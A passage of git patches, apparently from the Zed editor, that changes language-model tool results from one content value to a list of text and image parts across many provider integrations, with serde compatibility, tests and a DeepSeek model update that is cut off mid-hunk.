vec![LanguageModelToolResultContent::Text(Arc::from( + message.as_str(), + ))]; Self { raw_output: serde_json::Value::String(message), llm_output, @@ -3484,7 +3516,7 @@ where AgentToolOutput::from_error(format!("Failed 
to serialize tool output: {e}")) })?; Ok(AgentToolOutput { - llm_output: output.into(), + llm_output: vec![output.into()], raw_output, }) } @@ -3494,7 +3526,7 @@ where serde_json::Value::Null }); Err(AgentToolOutput { - llm_output: error_output.into(), + llm_output: vec![error_output.into()], raw_output, }) } @@ -4518,8 +4550,8 @@ mod tests { assert_eq!(result.tool_use_id, tool_use_id); assert_eq!(result.tool_name, tool_name); assert!(matches!( - result.content, - LanguageModelToolResultContent::Text(_) + result.content.as_slice(), + [LanguageModelToolResultContent::Text(_)] )); thread.update(cx, |thread, _cx| { diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 65b5df8abfe1c0..c5476d6343d188 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -5,6 +5,7 @@ use collections::{BTreeMap, HashMap}; use context_server::{ContextServerId, client::NotificationSubscription}; use futures::FutureExt as _; use gpui::{App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task}; +use language_model::LanguageModelToolResultContent; use project::context_server_store::{ContextServerStatus, ContextServerStore}; use std::sync::Arc; use util::ResultExt; @@ -389,11 +390,13 @@ impl AnyAgentTool for ContextServerTool { return Err(AgentToolOutput::from_error(error_message)); } - let mut result = String::new(); + let mut llm_output = Vec::new(); + let mut concatenated_text = String::new(); for content in response.content { match content { context_server::types::ToolResponseContent::Text { text } => { - result.push_str(&text); + concatenated_text.push_str(&text); + llm_output.push(LanguageModelToolResultContent::Text(text.into())); } context_server::types::ToolResponseContent::Image { .. 
} => { log::warn!("Ignoring image content from tool response"); @@ -406,9 +409,10 @@ impl AnyAgentTool for ContextServerTool { } } } + let raw_output = serde_json::Value::String(concatenated_text); Ok(AgentToolOutput { - raw_output: result.clone().into(), - llm_output: result.into(), + raw_output, + llm_output, }) }) } diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs index 3156fd253978bc..c82f652daca933 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -666,7 +666,7 @@ fn tool_result( tool_use_id: LanguageModelToolUseId::from(id.into()), tool_name: name.into(), is_error: false, - content: LanguageModelToolResultContent::Text(result.into()), + content: vec![LanguageModelToolResultContent::Text(result.into())], output: None, }) } diff --git a/crates/anthropic/src/completion.rs b/crates/anthropic/src/completion.rs index 7bb4821cc78755..48eed580d6839d 100644 --- a/crates/anthropic/src/completion.rs +++ b/crates/anthropic/src/completion.rs @@ -70,25 +70,38 @@ fn to_anthropic_content(content: MessageContent) -> Option { input: tool_use.input, cache_control: None, }), - MessageContent::ToolResult(tool_result) => Some(RequestContent::ToolResult { - tool_use_id: tool_result.tool_use_id.to_string(), - is_error: tool_result.is_error, - content: match tool_result.content { - LanguageModelToolResultContent::Text(text) => { + MessageContent::ToolResult(tool_result) => { + let content = match tool_result.content.as_slice() { + [LanguageModelToolResultContent::Text(text)] => { ToolResultContent::Plain(text.to_string()) } - LanguageModelToolResultContent::Image(image) => { - ToolResultContent::Multipart(vec![ToolResultPart::Image { - source: ImageSource { - source_type: "base64".to_string(), - media_type: "image/png".to_string(), - data: image.source.to_string(), - }, - }]) + _ => { + let parts = tool_result + .content + .into_iter() + 
.map(|part| match part { + LanguageModelToolResultContent::Text(text) => ToolResultPart::Text { + text: text.to_string(), + }, + LanguageModelToolResultContent::Image(image) => ToolResultPart::Image { + source: ImageSource { + source_type: "base64".to_string(), + media_type: "image/png".to_string(), + data: image.source.to_string(), + }, + }, + }) + .collect(); + ToolResultContent::Multipart(parts) } - }, - cache_control: None, - }), + }; + Some(RequestContent::ToolResult { + tool_use_id: tool_result.tool_use_id.to_string(), + is_error: tool_result.is_error, + content, + cache_control: None, + }) + } } } diff --git a/crates/google_ai/src/completion.rs b/crates/google_ai/src/completion.rs index efbd1dc9ff731f..b546682c5525c1 100644 --- a/crates/google_ai/src/completion.rs +++ b/crates/google_ai/src/completion.rs @@ -70,38 +70,39 @@ pub fn into_google( })] } MessageContent::ToolResult(tool_result) => { - match tool_result.content { - language_model_core::LanguageModelToolResultContent::Text(text) => { - vec![Part::FunctionResponsePart(crate::FunctionResponsePart { - function_response: crate::FunctionResponse { - name: tool_result.tool_name.to_string(), - // The API expects a valid JSON object - response: serde_json::json!({ - "output": text - }), - }, - })] - } - language_model_core::LanguageModelToolResultContent::Image(image) => { - vec![ - Part::FunctionResponsePart(crate::FunctionResponsePart { - function_response: crate::FunctionResponse { - name: tool_result.tool_name.to_string(), - // The API expects a valid JSON object - response: serde_json::json!({ - "output": "Tool responded with an image" - }), - }, - }), - Part::InlineDataPart(InlineDataPart { + let mut text_output = String::new(); + let mut images: Vec = Vec::new(); + for part in tool_result.content { + match part { + language_model_core::LanguageModelToolResultContent::Text(text) => { + text_output.push_str(&text); + } + language_model_core::LanguageModelToolResultContent::Image(image) => { + 
images.push(InlineDataPart { inline_data: GenerativeContentBlob { mime_type: "image/png".to_string(), data: image.source.to_string(), }, - }), - ] + }); + } } } + let output = if text_output.is_empty() && !images.is_empty() { + "Tool responded with an image".to_string() + } else { + text_output + }; + let mut parts = vec![Part::FunctionResponsePart(crate::FunctionResponsePart { + function_response: crate::FunctionResponse { + name: tool_result.tool_name.to_string(), + // The API expects a valid JSON object + response: serde_json::json!({ + "output": output + }), + }, + })]; + parts.extend(images.into_iter().map(Part::InlineDataPart)); + parts } }) .collect() diff --git a/crates/language_model/src/fake_provider.rs b/crates/language_model/src/fake_provider.rs index 4466a3f2762b03..dfef78b5fcec7b 100644 --- a/crates/language_model/src/fake_provider.rs +++ b/crates/language_model/src/fake_provider.rs @@ -125,6 +125,7 @@ pub struct FakeLanguageModel { forbid_requests: AtomicBool, supports_thinking: AtomicBool, supports_streaming_tools: AtomicBool, + supports_images: AtomicBool, } impl Default for FakeLanguageModel { @@ -138,6 +139,7 @@ impl Default for FakeLanguageModel { forbid_requests: AtomicBool::new(false), supports_thinking: AtomicBool::new(false), supports_streaming_tools: AtomicBool::new(false), + supports_images: AtomicBool::new(false), } } } @@ -174,6 +176,10 @@ impl FakeLanguageModel { self.supports_streaming_tools.store(supports, SeqCst); } + pub fn set_supports_images(&self, supports: bool) { + self.supports_images.store(supports, SeqCst); + } + pub fn pending_completions(&self) -> Vec { self.current_completion_txs .lock() @@ -280,7 +286,7 @@ impl LanguageModel for FakeLanguageModel { } fn supports_images(&self) -> bool { - false + self.supports_images.load(SeqCst) } fn supports_thinking(&self) -> bool { diff --git a/crates/language_model_core/src/request.rs b/crates/language_model_core/src/request.rs index a35f4883389f0a..f352ce16d227d6 100644 --- 
a/crates/language_model_core/src/request.rs +++ b/crates/language_model_core/src/request.rs @@ -102,12 +102,74 @@ pub struct LanguageModelToolResult { pub tool_use_id: LanguageModelToolUseId, pub tool_name: Arc, pub is_error: bool, - /// The tool output formatted for presenting to the model - pub content: LanguageModelToolResultContent, + #[serde(with = "tool_result_content_vec")] + pub content: Vec, /// The raw tool output, if available, often for debugging or extra state for replay pub output: Option, } +impl LanguageModelToolResult { + /// Concatenates all `Text` parts of the content, ignoring non-text parts. + pub fn text_contents(&self) -> String { + let mut buffer = String::new(); + for part in &self.content { + if let LanguageModelToolResultContent::Text(text) = part { + buffer.push_str(text); + } + } + buffer + } + + /// Returns true when there are no content parts, or every part is empty. + pub fn is_content_empty(&self) -> bool { + self.content.iter().all(|part| part.is_empty()) + } +} + +/// Serde helper that accepts both the legacy single-value shape and the new +/// array shape for `LanguageModelToolResult::content`, and normalizes both to +/// `Vec`. 
+mod tool_result_content_vec { + use super::LanguageModelToolResultContent; + use serde::{Deserialize, Deserializer, Serialize, Serializer}; + + pub fn serialize( + value: &Vec, + serializer: S, + ) -> Result + where + S: Serializer, + { + value.serialize(serializer) + } + + pub fn deserialize<'de, D>( + deserializer: D, + ) -> Result, D::Error> + where + D: Deserializer<'de>, + { + let value = serde_json::Value::deserialize(deserializer)?; + match value { + serde_json::Value::Array(items) => { + let mut out = Vec::with_capacity(items.len()); + for item in items { + out.push( + serde_json::from_value::(item) + .map_err(serde::de::Error::custom)?, + ); + } + Ok(out) + } + other => { + let single = serde_json::from_value::(other) + .map_err(serde::de::Error::custom)?; + Ok(vec![single]) + } + } + } +} + #[derive(Debug, Clone, Serialize, Eq, PartialEq, Hash)] pub enum LanguageModelToolResultContent { Text(Arc), @@ -231,21 +293,11 @@ pub enum MessageContent { } impl MessageContent { - pub fn to_str(&self) -> Option<&str> { - match self { - MessageContent::Text(text) => Some(text.as_str()), - MessageContent::Thinking { text, .. } => Some(text.as_str()), - MessageContent::RedactedThinking(_) => None, - MessageContent::ToolResult(tool_result) => tool_result.content.to_str(), - MessageContent::ToolUse(_) | MessageContent::Image(_) => None, - } - } - pub fn is_empty(&self) -> bool { match self { MessageContent::Text(text) => text.chars().all(|c| c.is_whitespace()), MessageContent::Thinking { text, .. 
} => text.chars().all(|c| c.is_whitespace()), - MessageContent::ToolResult(tool_result) => tool_result.content.is_empty(), + MessageContent::ToolResult(tool_result) => tool_result.is_content_empty(), MessageContent::RedactedThinking(_) | MessageContent::ToolUse(_) | MessageContent::Image(_) => false, @@ -277,8 +329,25 @@ pub struct LanguageModelRequestMessage { impl LanguageModelRequestMessage { pub fn string_contents(&self) -> String { let mut buffer = String::new(); - for string in self.content.iter().filter_map(|content| content.to_str()) { - buffer.push_str(string); + for content in &self.content { + match content { + MessageContent::Text(text) => { + buffer.push_str(text); + } + MessageContent::Thinking { text, .. } => { + buffer.push_str(text); + } + MessageContent::ToolResult(tool_result) => { + for part in &tool_result.content { + if let LanguageModelToolResultContent::Text(text) = part { + buffer.push_str(text); + } + } + } + MessageContent::RedactedThinking(_) + | MessageContent::ToolUse(_) + | MessageContent::Image(_) => {} + } } buffer } @@ -462,4 +531,90 @@ mod tests { _ => panic!("Expected Image variant"), } } + + #[test] + fn test_language_model_tool_result_content_vec_deserialization() { + // Legacy single-value shape is normalized to a Vec. + let json = serde_json::json!({ + "tool_use_id": "abc", + "tool_name": "echo", + "is_error": false, + "content": "hello", + "output": null, + }); + let result: LanguageModelToolResult = serde_json::from_value(json).unwrap(); + assert_eq!( + result.content, + vec![LanguageModelToolResultContent::Text(Arc::from("hello"))] + ); + + // Legacy wrapped single-value shape also works. 
+ let json = serde_json::json!({ + "tool_use_id": "abc", + "tool_name": "echo", + "is_error": false, + "content": {"type": "text", "text": "hello"}, + "output": null, + }); + let result: LanguageModelToolResult = serde_json::from_value(json).unwrap(); + assert_eq!( + result.content, + vec![LanguageModelToolResultContent::Text(Arc::from("hello"))] + ); + + // New array shape with text + image deserializes into a Vec. + let json = serde_json::json!({ + "tool_use_id": "abc", + "tool_name": "echo", + "is_error": false, + "content": [ + {"type": "text", "text": "foo"}, + {"source": "data", "size": {"width": 1, "height": 2}} + ], + "output": null, + }); + let result: LanguageModelToolResult = serde_json::from_value(json).unwrap(); + assert_eq!(result.content.len(), 2); + assert_eq!( + result.content[0], + LanguageModelToolResultContent::Text(Arc::from("foo")) + ); + match &result.content[1] { + LanguageModelToolResultContent::Image(image) => { + assert_eq!(image.source.as_ref(), "data"); + } + _ => panic!("Expected Image variant"), + } + + // Round-tripping preserves multi-part content. 
+ let roundtripped: LanguageModelToolResult = + serde_json::from_value(serde_json::to_value(&result).unwrap()).unwrap(); + assert_eq!(roundtripped, result); + } + + #[test] + fn test_string_contents_includes_all_tool_result_text_parts() { + let tool_result = LanguageModelToolResult { + tool_use_id: LanguageModelToolUseId::from("id".to_string()), + tool_name: Arc::from("tool"), + is_error: false, + content: vec![ + LanguageModelToolResultContent::Text(Arc::from("first ")), + LanguageModelToolResultContent::Image(LanguageModelImage::empty()), + LanguageModelToolResultContent::Text(Arc::from("second")), + ], + output: None, + }; + let message = LanguageModelRequestMessage { + role: Role::User, + content: vec![ + MessageContent::Text("prefix ".to_string()), + MessageContent::ToolResult(tool_result), + MessageContent::Text(" suffix".to_string()), + ], + cache: false, + reasoning_details: None, + }; + assert_eq!(message.string_contents(), "prefix first second suffix"); + } } diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index 1a8d477192ec55..fb48e7d73a20dc 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -918,9 +918,10 @@ pub fn into_bedrock( } MessageContent::ToolResult(tool_result) => { messages_contain_tool_content = true; - BedrockToolResultBlock::builder() - .tool_use_id(tool_result.tool_use_id.to_string()) - .content(match tool_result.content { + let mut builder = BedrockToolResultBlock::builder() + .tool_use_id(tool_result.tool_use_id.to_string()); + for part in tool_result.content { + let block = match part { LanguageModelToolResultContent::Text(text) => { BedrockToolResultContentBlock::Text(text.to_string()) } @@ -961,7 +962,10 @@ pub fn into_bedrock( } } } - }) + }; + builder = builder.content(block); + } + builder .status({ if tool_result.is_error { BedrockToolResultStatus::Error diff --git 
a/crates/language_models/src/provider/copilot_chat.rs b/crates/language_models/src/provider/copilot_chat.rs index db50f5161e397e..1fc1dc3ce4a098 100644 --- a/crates/language_models/src/provider/copilot_chat.rs +++ b/crates/language_models/src/provider/copilot_chat.rs @@ -868,23 +868,40 @@ fn into_copilot_chat( Role::User => { for content in &message.content { if let MessageContent::ToolResult(tool_result) = content { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => text.to_string().into(), - LanguageModelToolResultContent::Image(image) => { - if model.supports_vision() { - ChatMessageContent::Multipart(vec![ChatMessagePart::Image { - image_url: ImageUrl { - url: image.to_base64_url(), - }, - }]) - } else { - debug_panic!( - "This should be caught at {} level", - tool_result.tool_name - ); - "[Tool responded with an image, but this model does not support vision]".to_string().into() + let parts: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + ChatMessagePart::Text { + text: text.to_string(), + } } + LanguageModelToolResultContent::Image(image) => { + if model.supports_vision() { + ChatMessagePart::Image { + image_url: ImageUrl { + url: image.to_base64_url(), + }, + } + } else { + debug_panic!( + "This should be caught at {} level", + tool_result.tool_name + ); + ChatMessagePart::Text { + text: "[Tool responded with an image, but this model does not support vision]".to_string(), + } + } + } + }) + .collect(); + + let content = match parts.as_slice() { + [ChatMessagePart::Text { text }] => { + ChatMessageContent::Plain(text.clone()) } + _ => ChatMessageContent::Multipart(parts), }; messages.push(ChatMessage::Tool { @@ -1088,27 +1105,39 @@ fn into_copilot_responses( Role::User => { for content in &message.content { if let MessageContent::ToolResult(tool_result) = content { - let output = match &tool_result.content { - 
LanguageModelToolResultContent::Text(text) => { + let output = match tool_result.content.as_slice() { + [LanguageModelToolResultContent::Text(text)] => { responses::ResponseFunctionOutput::Text(text.to_string()) } - LanguageModelToolResultContent::Image(image) => { - if model.supports_vision() { - responses::ResponseFunctionOutput::Content(vec![ - responses::ResponseInputContent::InputImage { - image_url: Some(image.to_base64_url()), - detail: Default::default(), - }, - ]) - } else { - debug_panic!( - "This should be caught at {} level", - tool_result.tool_name - ); - responses::ResponseFunctionOutput::Text( - "[Tool responded with an image, but this model does not support vision]".into(), - ) - } + _ => { + let parts = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + responses::ResponseInputContent::InputText { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + if model.supports_vision() { + responses::ResponseInputContent::InputImage { + image_url: Some(image.to_base64_url()), + detail: Default::default(), + } + } else { + debug_panic!( + "This should be caught at {} level", + tool_result.tool_name + ); + responses::ResponseInputContent::InputText { + text: "[Tool responded with an image, but this model does not support vision]".to_string(), + } + } + } + }) + .collect(); + responses::ResponseFunctionOutput::Content(parts) } }; diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index dfc8521154e17a..a08cc25c7b5fb0 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -378,15 +378,26 @@ pub fn into_deepseek( } } MessageContent::ToolResult(tool_result) => { - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - messages.push(deepseek::RequestMessage::Tool { - content: text.to_string(), - tool_call_id: 
tool_result.tool_use_id.to_string(), - }); + let mut text_parts: Vec = Vec::new(); + for part in &tool_result.content { + match part { + LanguageModelToolResultContent::Text(text) => { + text_parts.push(text.to_string()); + } + LanguageModelToolResultContent::Image(_) => { + text_parts.push("[Tool responded with an image]".to_string()); + } } - LanguageModelToolResultContent::Image(_) => {} + } + let content = if text_parts.is_empty() { + "".to_string() + } else { + text_parts.join("\n") }; + messages.push(deepseek::RequestMessage::Tool { + content, + tool_call_id: tool_result.tool_use_id.to_string(), + }); } } } diff --git a/crates/language_models/src/provider/lmstudio.rs b/crates/language_models/src/provider/lmstudio.rs index f035e765f0737d..50ac12865240e4 100644 --- a/crates/language_models/src/provider/lmstudio.rs +++ b/crates/language_models/src/provider/lmstudio.rs @@ -380,21 +380,25 @@ impl LmStudioLanguageModel { } } MessageContent::ToolResult(tool_result) => { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - vec![lmstudio::MessagePart::Text { - text: text.to_string(), - }] - } - LanguageModelToolResultContent::Image(image) => { - vec![lmstudio::MessagePart::Image { - image_url: lmstudio::ImageUrl { - url: image.to_base64_url(), - detail: None, - }, - }] - } - }; + let content: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + lmstudio::MessagePart::Text { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + lmstudio::MessagePart::Image { + image_url: lmstudio::ImageUrl { + url: image.to_base64_url(), + detail: None, + }, + } + } + }) + .collect(); messages.push(lmstudio::ChatMessage::Tool { content: content.into(), diff --git a/crates/language_models/src/provider/mistral.rs b/crates/language_models/src/provider/mistral.rs index cce5448b9938e3..403d94e9832178 100644 --- 
a/crates/language_models/src/provider/mistral.rs +++ b/crates/language_models/src/provider/mistral.rs @@ -390,14 +390,19 @@ pub fn into_mistral( // Tool use is not supported in User messages for Mistral } MessageContent::ToolResult(tool_result) => { - let tool_content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => text.to_string(), - LanguageModelToolResultContent::Image(_) => { - "[Tool responded with an image, but Zed doesn't support these in Mistral models yet]".to_string() + let mut text_parts: Vec = Vec::new(); + for part in &tool_result.content { + match part { + LanguageModelToolResultContent::Text(text) => { + text_parts.push(text.to_string()); + } + LanguageModelToolResultContent::Image(_) => { + text_parts.push("[Tool responded with an image, but Zed doesn't support these in Mistral models yet]".to_string()); + } } - }; + } messages.push(mistral::RequestMessage::Tool { - content: tool_content, + content: text_parts.join("\n"), tool_call_id: tool_result.tool_use_id.to_string(), }); } diff --git a/crates/language_models/src/provider/ollama.rs b/crates/language_models/src/provider/ollama.rs index 229b59e2bfded2..f38321b7c88187 100644 --- a/crates/language_models/src/provider/ollama.rs +++ b/crates/language_models/src/provider/ollama.rs @@ -363,7 +363,7 @@ impl OllamaLanguageModel { MessageContent::ToolResult(tool_result) => { messages.push(ChatMessage::Tool { tool_name: tool_result.tool_name.to_string(), - content: tool_result.content.to_str().unwrap_or("").to_string(), + content: tool_result.text_contents(), }) } _ => unreachable!("Only tool result should be extracted"), diff --git a/crates/language_models/src/provider/open_router.rs b/crates/language_models/src/provider/open_router.rs index 6562d9de085229..bc4fbcc9aa761d 100644 --- a/crates/language_models/src/provider/open_router.rs +++ b/crates/language_models/src/provider/open_router.rs @@ -465,18 +465,22 @@ pub fn into_open_router( } } 
MessageContent::ToolResult(tool_result) => { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - vec![open_router::MessagePart::Text { - text: text.to_string(), - }] - } - LanguageModelToolResultContent::Image(image) => { - vec![open_router::MessagePart::Image { - image_url: image.to_base64_url(), - }] - } - }; + let content: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + open_router::MessagePart::Text { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + open_router::MessagePart::Image { + image_url: image.to_base64_url(), + } + } + }) + .collect(); messages.push(open_router::RequestMessage::Tool { content: content.into(), diff --git a/crates/open_ai/src/completion.rs b/crates/open_ai/src/completion.rs index 3068f57f582db1..4abc752c4d5b65 100644 --- a/crates/open_ai/src/completion.rs +++ b/crates/open_ai/src/completion.rs @@ -104,21 +104,21 @@ pub fn into_open_ai( } } MessageContent::ToolResult(tool_result) => { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - vec![MessagePart::Text { + let content: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => MessagePart::Text { text: text.to_string(), - }] - } - LanguageModelToolResultContent::Image(image) => { - vec![MessagePart::Image { + }, + LanguageModelToolResultContent::Image(image) => MessagePart::Image { image_url: ImageUrl { url: image.to_base64_url(), detail: None, }, - }] - } - }; + }, + }) + .collect(); messages.push(crate::RequestMessage::Tool { content: content.into(), @@ -270,21 +270,34 @@ fn append_message_to_response_items( } MessageContent::ToolResult(tool_result) => { flush_response_parts(&message.role, index, &mut content_parts, input_items); + let output = match tool_result.content.as_slice() { + [LanguageModelToolResultContent::Text(text)] => 
{ + ResponseFunctionCallOutputContent::Text(text.to_string()) + } + _ => { + let parts = tool_result + .content + .into_iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + ResponseInputContent::Text { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + ResponseInputContent::Image { + image_url: image.to_base64_url(), + } + } + }) + .collect(); + ResponseFunctionCallOutputContent::List(parts) + } + }; input_items.push(ResponseInputItem::FunctionCallOutput( ResponseFunctionCallOutputItem { call_id: tool_result.tool_use_id.to_string(), - output: match tool_result.content { - LanguageModelToolResultContent::Text(text) => { - ResponseFunctionCallOutputContent::Text(text.to_string()) - } - LanguageModelToolResultContent::Image(image) => { - ResponseFunctionCallOutputContent::List(vec![ - ResponseInputContent::Image { - image_url: image.to_base64_url(), - }, - ]) - } - }, + output, }, )); } @@ -933,7 +946,7 @@ mod tests { tool_use_id: tool_call_id, tool_name: Arc::from("get_weather"), is_error: false, - content: LanguageModelToolResultContent::Text(Arc::from("Sunny")), + content: vec![LanguageModelToolResultContent::Text(Arc::from("Sunny"))], output: Some(json!({ "forecast": "Sunny" })), }; let user_image = LanguageModelImage { @@ -1634,7 +1647,7 @@ mod tests { tool_use_id: tool_use_id, tool_name: Arc::from("search"), is_error: false, - content: LanguageModelToolResultContent::Text(Arc::from("result")), + content: vec![LanguageModelToolResultContent::Text(Arc::from("result"))], output: None, }; let request = LanguageModelRequest { From f2c5ee7ba7500faf33b584af7398f0e9223f32ec Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 27 Apr 2026 15:03:33 +0200 Subject: [PATCH 058/231] Implement tool result conversion for anyhow errors (#55001) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is 
consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/agent/src/thread.rs | 29 ++++++++++--------- .../src/tools/context_server_registry.rs | 21 ++++++++------ crates/language_model_core/src/request.rs | 6 ++++ 3 files changed, 34 insertions(+), 22 deletions(-) diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 2a8a6a5b3cb290..07e6facb1fba89 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -2448,9 +2448,10 @@ impl Thread { .collect(); (false, output) } else { - let output = AgentToolOutput::from_error( + let output = anyhow::anyhow!( "Attempted to read an image, but this model doesn't support it.", - ); + ) + .into(); (true, output) } } else { @@ -3426,14 +3427,15 @@ pub struct AgentToolOutput { pub raw_output: serde_json::Value, } -impl AgentToolOutput { - pub fn from_error(message: impl Into) -> Self { - let message = message.into(); - let llm_output = vec![LanguageModelToolResultContent::Text(Arc::from( - message.as_str(), - ))]; +impl From for AgentToolOutput { + fn from(error: anyhow::Error) -> Self { + let llm_output = vec![error.into()]; + let raw_output = serde_json::to_value(&llm_output).unwrap_or_else(|e| { + log::error!("Failed to serialize tool output: {e}"); + serde_json::Value::Null + }); Self { - raw_output: serde_json::Value::String(message), + raw_output, llm_output, } } @@ -3512,12 +3514,13 @@ where let task = self.0.clone().run(tool_input, event_stream, cx); cx.spawn(async move |_cx| match task.await { Ok(output) => { - let raw_output = serde_json::to_value(&output).map_err(|e| { - AgentToolOutput::from_error(format!("Failed to serialize tool output: {e}")) - })?; + let raw_output = serde_json::to_value(&output).unwrap_or_else(|e| { + log::error!("Failed to serialize tool output: {e}"); + 
serde_json::Value::Null + }); Ok(AgentToolOutput { - llm_output: vec![output.into()], raw_output, + llm_output: vec![output.into()], }) } Err(error_output) => { diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index c5476d6343d188..261c89e6b80e7d 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -337,7 +337,7 @@ impl AnyAgentTool for ContextServerTool { cx: &mut App, ) -> Task> { let Some(server) = self.store.read(cx).get_running_server(&self.server_id) else { - return Task::ready(Err(AgentToolOutput::from_error("Context server not found"))); + return Task::ready(Err(anyhow::anyhow!("Context server not found").into())); }; let tool_name = self.tool.name.clone(); let tool_id = mcp_tool_id(&self.server_id.0, &self.tool.name); @@ -347,14 +347,17 @@ impl AnyAgentTool for ContextServerTool { event_stream.authorize_third_party_tool(initial_title, tool_id, display_name, cx); cx.spawn(async move |_cx| { - let input = input.recv().await.map_err(|e| { - AgentToolOutput::from_error(format!("Failed to receive tool input: {e}")) - })?; + let input = input + .recv() + .await + .map_err(|e| anyhow::anyhow!(format!("Failed to receive tool input: {e}")))?; - authorize.await.map_err(|e| AgentToolOutput::from_error(e.to_string()))?; + authorize + .await + .map_err(|e| anyhow::anyhow!(e.to_string()))?; let Some(protocol) = server.client() else { - return Err(AgentToolOutput::from_error("Context server not initialized")); + return Err(anyhow::anyhow!("Context server not initialized").into()); }; let arguments = if let serde_json::Value::Object(map) = input { @@ -378,16 +381,16 @@ impl AnyAgentTool for ContextServerTool { ); let response = futures::select! 
{ - response = request.fuse() => response.map_err(|e| AgentToolOutput::from_error(e.to_string()))?, + response = request.fuse() => response?, _ = event_stream.cancelled_by_user().fuse() => { - return Err(AgentToolOutput::from_error("MCP tool cancelled by user")); + return Err(anyhow::anyhow!("MCP tool cancelled by user").into()); } }; if response.is_error == Some(true) { let error_message: String = response.content.iter().filter_map(|c| c.text()).collect(); - return Err(AgentToolOutput::from_error(error_message)); + return Err(anyhow::anyhow!(error_message).into()); } let mut llm_output = Vec::new(); diff --git a/crates/language_model_core/src/request.rs b/crates/language_model_core/src/request.rs index f352ce16d227d6..b2b42c091bcc7f 100644 --- a/crates/language_model_core/src/request.rs +++ b/crates/language_model_core/src/request.rs @@ -273,6 +273,12 @@ impl From for LanguageModelToolResultContent { } } +impl From for LanguageModelToolResultContent { + fn from(error: anyhow::Error) -> Self { + Self::Text(Arc::from(error.to_string())) + } +} + impl From for LanguageModelToolResultContent { fn from(image: LanguageModelImage) -> Self { Self::Image(image) From 8cec8b74ef192dcababe339fd42a5ab327377491 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 27 Apr 2026 15:30:00 +0200 Subject: [PATCH 059/231] compliance: Fix futures dependency (#55003) We need this nowaways outside of the octocrab feature too Release Notes: - N/A --- tooling/compliance/Cargo.toml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tooling/compliance/Cargo.toml b/tooling/compliance/Cargo.toml index 9b1ade359daa4b..f98fef63053a0d 100644 --- a/tooling/compliance/Cargo.toml +++ b/tooling/compliance/Cargo.toml @@ -9,13 +9,13 @@ license = "GPL-3.0-or-later" workspace = true [features] -octo-client = ["dep:octocrab", "dep:jsonwebtoken", "dep:futures", "dep:tokio"] +octo-client = ["dep:octocrab", "dep:jsonwebtoken", "dep:tokio"] [dependencies] anyhow.workspace = true 
async-trait.workspace = true derive_more.workspace = true -futures = { workspace = true, optional = true } +futures.workspace = true itertools.workspace = true jsonwebtoken = { version = "10.2", features = ["use_pem"], optional = true } octocrab = { version = "0.49", default-features = false, features = [ From 5d25a9b036028d55c8fa7a06c9633642f069a177 Mon Sep 17 00:00:00 2001 From: Xiaobo Liu Date: Mon, 27 Apr 2026 21:50:00 +0800 Subject: [PATCH 060/231] deepseek: Add deepseek-v4-pro & deepseek-v4-flash (#54731) reference: https://api-docs.deepseek.com/ Release Notes: - Added deepseek-v4-pro and deepseek-v4-flash models --------- Signed-off-by: Xiaobo Liu Co-authored-by: Ben Brandt Co-authored-by: MrSubidubi --- crates/deepseek/src/deepseek.rs | 52 ++++++++---- .../language_models/src/provider/deepseek.rs | 82 ++++++++++++++++--- docs/src/ai/llm-providers.md | 17 ++-- 3 files changed, 118 insertions(+), 33 deletions(-) diff --git a/crates/deepseek/src/deepseek.rs b/crates/deepseek/src/deepseek.rs index 19e1f6c2466512..478195c68e6ba5 100644 --- a/crates/deepseek/src/deepseek.rs +++ b/crates/deepseek/src/deepseek.rs @@ -48,11 +48,11 @@ impl From for String { #[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] #[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq)] pub enum Model { - #[serde(rename = "deepseek-chat")] + #[serde(rename = "deepseek-v4-flash")] + 